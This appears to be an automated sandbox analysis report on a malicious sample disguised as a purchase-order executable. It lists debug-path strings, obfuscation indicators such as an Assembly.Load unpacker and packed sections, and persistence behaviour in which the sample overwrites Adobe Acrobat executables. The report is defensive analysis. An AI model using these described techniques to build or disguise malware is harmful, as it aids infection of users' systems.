Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: uws\dll\mscorlib.pdbe source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb source: Aut2exe.exe.11.dr
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: alg.exe, 0000000B.00000003.1814990672.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2262552254.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, 64BitMAPIBroker.exe.11.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe0.11.dr
Source:	Binary string: GoogleUpdateCore_unsigned.pdbV source: GoogleUpdateCore.exe.11.dr
Source:	Binary string: firefox.pdb source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000B.00000003.2241398314.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: chrome_proxy.exe.11.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
Source:	Binary string: mscorlib.pdb source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005EBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.11.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.11.dr
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.75f0000.3.raw.unpack, MainForm.cs

.Net Code: System.Reflection.Assembly.Load(byte[])

Source: alg.exe.8.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

8_2_004019F0

Source: armsvc.exe.8.dr	Static PE information: section name: .didat
Source: alg.exe.8.dr	Static PE information: section name: .didat
Source: FXSSVC.exe.8.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 0_2_015C72DA pushfd ; ret	0_2_015C72DD
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0041C40C push cs; iretd	8_2_0041C4E2
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00423149 push eax; ret	8_2_00423179
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0041C50E push cs; iretd	8_2_0041C4E2
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_004231C8 push eax; ret	8_2_00423179
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0040E21D push ecx; ret	8_2_0040E230
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0041C6BE push ebx; ret	8_2_0041C6BF
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0040BB97 push dword ptr [ecx-75h]; iretd	8_2_0040BBA3
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD520C push 02BD528Fh; ret	8_2_02BD522D
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD4B70 push 02BD4C73h; ret	8_2_02BD4B9C
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD4B70 push 02BD4E86h; ret	8_2_02BD4C24
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD4B70 push 02BD4E27h; ret	8_2_02BD4EC9
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDB180 push 02BDB0CAh; ret	8_2_02BDB061
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDB180 push 02BDB30Dh; ret	8_2_02BDB1E6
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDB180 push 02BDB2F2h; ret	8_2_02BDB262
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDB180 push 02BDB255h; ret	8_2_02BDB2ED
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDB180 push 02BDB2D0h; ret	8_2_02BDB346
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDB180 push 02BDB37Fh; ret	8_2_02BDB3B7
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDCD65h; ret	8_2_02BDCC98
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDCD58h; ret	8_2_02BDCCD8
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDCE1Ch; ret	8_2_02BDCE1B
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDCFECh; ret	8_2_02BDCEB2
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD2B5h; ret	8_2_02BDCF7B
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD4CEh; ret	8_2_02BDCFB6
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD46Ch; ret	8_2_02BDCFD6
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD6E7h; ret	8_2_02BDD0AB
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD7C6h; ret	8_2_02BDD15E
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD003h; ret	8_2_02BDD1DD
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD19Fh; ret	8_2_02BDD27C
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD307h; ret	8_2_02BDD2E6
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BDCE90 push 02BDD1C8h; ret	8_2_02BDD441

Source: PO_2024_056209_MQ04865_ENQ_1045.exe	Static PE information: section name: .text entropy: 7.982441629282343
Source: zeXKjViL.exe.0.dr	Static PE information: section name: .text entropy: 7.982441629282343
Source: AppVClient.exe.8.dr	Static PE information: section name: .reloc entropy: 7.936507952897012
Source: FXSSVC.exe.8.dr	Static PE information: section name: .reloc entropy: 7.942257807197702

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a5f0bea56967b89b.bin

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
